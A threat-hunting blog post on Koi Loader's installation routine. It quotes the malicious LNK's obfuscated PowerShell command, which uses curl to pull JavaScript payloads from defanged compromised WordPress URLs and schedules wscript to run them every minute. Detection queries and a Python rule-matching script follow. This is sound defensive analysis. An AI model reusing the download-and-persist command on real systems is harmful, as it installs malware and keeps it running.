175. Hunting Koi Loader Installation Routine
Hello everyone!
Malware installation routines are noisy. Most of the time. What does that mean for us? We can turn this noise into detection and hunting ideas!
Let's look at Koi Loader. It's commonly delivered with the help of malicious LNK files, like this one. The LNK executes the following command:
powershell.exe -command $q7hl1gh07lmh4rm = 'ws'+'cr'+'ip' + 't ' + '%ProgramData%\' + ('nblxsl7b2fdze5.js wg3c86ft8'); & ('cu'+'r'+'l.ex'+'e') -sL -o nblxsl7b2fdze5.js 'hXXps://ayeorganization[.]com/wp-content/uploads/2019/04/goosehouseel.php'; & ('cur'+'l.e'+'xe') -s -o e8p1xhlnt1xd -L 'hXXps://ayeorganization[.]com/wp-content/uploads/2019/04/pseudophilanthropicalgjxR.php'; mv e8p1xhlnt1xd wg3c86ft8.js; . ('sc'+'hta' + 'sks') /create /sc minute /f /mo 1 /tr $q7hl1gh07lmh4rm /tn wg3c86ft8;
As you can see, there are lots of detection and hunting opportunities here! Let's start with abusing PowerShell to create a scheduled task:
event_type: "processcreatewin"
AND
proc_file_name: "powershell.exe"
AND
cmdline: ("create" AND "minute")
Next, abusing curl.exe to download a malicious file from a compromised WordPress website:
event_type: "processcreatewin"
AND
proc_file_name: "curl.exe"
AND
cmdline: "wp-content"
Finally, let's hunt for suspicious JS files executed from %ProgramData% subfolders:
event_type: "processcreatewin"
AND
proc_file_name: "wscript.exe"
AND
cmdline: ("programdata" AND "*.js")
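The same three hunts as a small Python script, added here as an example and not part of the original post. It runs over constructed process-creation events modelled on the command line above (URLs kept defanged), and goes one step beyond the queries by folding PowerShell string concatenation so the split names ('sc'+'hta'+'sks') become searchable; field names follow the queries, the rule names are my own.

```python
import re
from typing import Dict, List

# Constructed sample events modelled on the Koi Loader chain in the post.
EVENTS: List[Dict[str, str]] = [
    {"event_type": "processcreatewin", "proc_file_name": "powershell.exe",
     "cmdline": "powershell.exe -command $q = 'ws'+'cr'+'ip' + 't ' + '%ProgramData%\\' + "
                "('nblxsl7b2fdze5.js wg3c86ft8'); & ('cu'+'r'+'l.ex'+'e') -sL -o nblxsl7b2fdze5.js "
                "'hXXps://ayeorganization[.]com/wp-content/uploads/2019/04/goosehouseel.php'; "
                ". ('sc'+'hta' + 'sks') /create /sc minute /f /mo 1 /tr $q /tn wg3c86ft8;"},
    {"event_type": "processcreatewin", "proc_file_name": "curl.exe",
     "cmdline": "curl.exe -sL -o nblxsl7b2fdze5.js "
                "hXXps://ayeorganization[.]com/wp-content/uploads/2019/04/goosehouseel.php"},
    {"event_type": "processcreatewin", "proc_file_name": "wscript.exe",
     "cmdline": "wscript C:\\ProgramData\\nblxsl7b2fdze5.js wg3c86ft8"},
    {"event_type": "processcreatewin", "proc_file_name": "powershell.exe",
     "cmdline": "powershell.exe -command Get-Date"},  # benign control event
]

# 'ws'+'cr'+'ip' + 't ' -> 'wscript '. Two adjacent single-quoted literals
# joined by '+' are merged; repeating until stable folds longer chains.
_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")

def fold_concat(cmdline: str) -> str:
    """Collapse PowerShell string concatenation until nothing changes."""
    prev = None
    while prev != cmdline:
        prev = cmdline
        cmdline = _CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", cmdline)
    return cmdline

# rule name -> (process image, substrings that must all appear in the cmdline)
RULES = {
    "powershell_schtasks_minute": ("powershell.exe", ["create", "minute"]),
    "curl_wp_content_download": ("curl.exe", ["wp-content"]),
    "wscript_programdata_js": ("wscript.exe", ["programdata", ".js"]),
    # Added enrichment: LOLBin names reassembled from concatenated fragments.
    "powershell_concat_lolbin": ("powershell.exe", ["schtasks", "wscript"]),
}

def hunt(event: Dict[str, str]) -> List[str]:
    """Return the names of the hunting rules a process-creation event matches."""
    if event.get("event_type") != "processcreatewin":
        return []
    cmd = fold_concat(event.get("cmdline", "")).lower()
    image = event.get("proc_file_name", "").lower()
    return [name for name, (img, terms) in RULES.items()
            if image == img and all(t in cmd for t in terms)]

if __name__ == "__main__":
    for ev in EVENTS:
        print(ev["proc_file_name"], "->", hunt(ev) or "no match")
```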
See you tomorrow!